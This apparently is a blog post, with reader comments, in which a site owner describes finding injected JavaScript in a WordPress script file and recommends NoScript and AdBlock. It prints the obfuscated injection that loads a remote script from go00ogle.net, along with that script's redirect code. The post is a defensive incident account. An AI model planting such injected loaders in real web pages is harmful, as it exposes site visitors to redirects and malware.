Being web-cracked: experience and advice

Has your web site ever been “infected”?

This happened to me today, first time in my life. Hello from go00ogle.net. Below are technical details on what exactly happened, why I did not suffer any damage, and what I recommend to do in order to reduce your own susceptibility. The article is written for a non-technical reader.

How did I see that something is wrong?

go00ogle.net blocked by NoScript Administering my another blog today, I have noticed something in my web browser which I did not see before: the icon of NoScript (a Firefox add-on) was showing, that some scripts are blocked from execution. That is the small blue “S” with an even smaller red circle in the Firefox information bar, shown on the picture to the left.

NoScript stops the browser from executing scripts, which are parts of the web pages we are browsing. It is a common practice nowadays to call scripts from other hosts than the one where the web page itself is hosted. NoScript by default blocks such calls and shows the red icon. Click it, and you see which hosts the web page has tried to call. I whitelisted my own host shemyak.com, but I knew for sure that my blog should not call any scripts from host such as go00ogle.net.

This is an indication that my host is doing something I did not ask him to.

How did I find what was it?

go00ogle.net blocked by AdBlock The easiest thing nowadays is to type the question into the search engine. Google.com does not (at the moment of this writing) show anything helpful about go00ogle.com, except couple of links to forums where the latter is called scam site. But “google safe browsing” itself identifies the almost-namesake as “suspicious”, and claims it “has hosted malicious software” as of 15.6.2009 (yesterday). Not much real information, at least yet.

Let’s look into the source ourselves. The source of my “problematic” page does not contain string “go00ogle” anywhere. So, the call to this site is done from some other script, called by this page.

Their location can be found from the page source, but it’s even easier with the other security and privacy tool, AdBlock. Its window shows list of all “items” on the page – images, styles, scripts and embedded objects. Cool, I see the script about which the NoScript informed me, and also two other scripts which were always there.

Which of the two is the source of the problem? Thanks AdBlock, I can just block them one by one and see if NoScript still complains about blocking go00ogle.net. It turns out that the second one is “infected”, the first is not.

Let’s now explore “the bad” script. I copy its location and download it with wget:

$ wget -O infected-script 'http://www.konstantin.shemyak.com/dnevnik/wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4'

And open it with a text editor. The suspect is there! Here is the piece of code “calling home” in the line number 20:

jQuery.noConflict();function advQuery(){var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));};advQuery();

The URL go00ogle.net is obfuscated (I do not see a reason why the author of this script took his/her time to do it). The result of the execution is that the browser gets the following instruction:

<script src="http://go00ogle.net/if.php">

And the default behavior of the browser would be to execute this script. Good that NoScript changes it.

What could happen if I had not used the prevention measures?

Let’s see, what is inside that go00ogle.net/if.php:

document.write("<script type=\"text/javascript\" src=\"http://www.trafing.net/show-banner.php?kod=954815&site=www.surinamefoto.com\"></script>");

So it’s a redirect to another script. It may also roll up a counter for “surinamefoto.com”. Unwrapping what comes from trafing.net, I saw two other redirects, again with possible roll-ups of counters. I lost the interest for hunting it down further and a) submitted a support ticket to my hosting provider b) informed WordPress community about the issue (I was not the first victim there).

Conclusion:

noscript logo It’s that simple. Just use tools like AdBlock and NoScript. The first is the “blacklist”-type filter (specifically prohibiting items which you know you do not want – works great for advertising banners and counters you do not need), the second is “whitelist” (prohibiting by default everything, except items you have explicitly asked). By default, your browser may be executing any code – even coming from places you never asked for. This is probably not a good idea, so do not use a web browser for which you can’t easily disable the insecure behavior.

9 thoughts on “Being web-cracked: experience and advice

  1. wget -O infected-script ‘http://www.konstantin.shemyak.com/dnevnik/wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4’

    Hm. But the key question is how this script was infected? How the attacker was able to add his stuff into the page which is hosted by your server?

    • Exactly. The responsibility division between me and the provider is not absolutely clear, as this is their “automatic install”, but I did a number of customizations to it. Well, backups are made, stay tuned 🙂

  2. I got new for you!

    Your site is still trying to infect visitors.

    It’s trying to deliver a malicious Adobe Acrobat file. Luckily I had javascript turned off in Acrobat.

    Many of these infections have been the result of a virus/trojan on the PC used to update the website. We’ve had the best luck in finding and eradicating these PC infections with a combination of AVG and Malwarebytes.

    According to our scanners, blog/index.html is also infected.

    Do you have the log files for your site? Do you seen any FTP activity that is not yours?

    In the log files do you see any POSTs with strange query strings?

    If you get nowhere with your hosting provider, please contact me off-list and we’ll help you. We help out a lot on http://www.badwarebusters.org

    Good luck!

    • @Thomas, thank you. I think I’ve cleaned up the malicious code now, and it’s true that during some time period this site was spreading the scam! Digging the logs now…

  3. Strictly speaking NoScript is absolutely The Must for the Web surfing. Some time ago my browser (both IE and Firefox) cache contained at least several pieces of a dangerous junk – trojans, rootkits, etc. Everything is clear after NoScript was installed. Yes, it imposes some inconvenience. But just a little and almost incomparable with a possible harm.
    One could say – antivirus is the solution. Well, but remember – illness goes first, the cure – later. And there is a time leap when your infection won’t be known and detected.

    • illness goes first, the cure – later
      Or even better: prevention is easier than cure 🙂

  4. Mine comes back every day even after I remove the code. I’m starting to suspect the database, as the files do not have modify dates. has it come back for you? did you do anything other than what is listed above in this article you wrote? I’m on DH too.

    • Hi Lunesse,
      Nope, I have not done anything to actually close the entry point. That’s because I was not able to find it. I removed the infected code from the web pages and also found a file in my home directory on the provider’s server which was likely used for the exploit. Got no idea on how it appeared there. Removed that one too, and the exploit does not seem to come back. I realize that the hole is most likely still open 🙁

Leave a Reply

Your email address will not be published. Required fields are marked *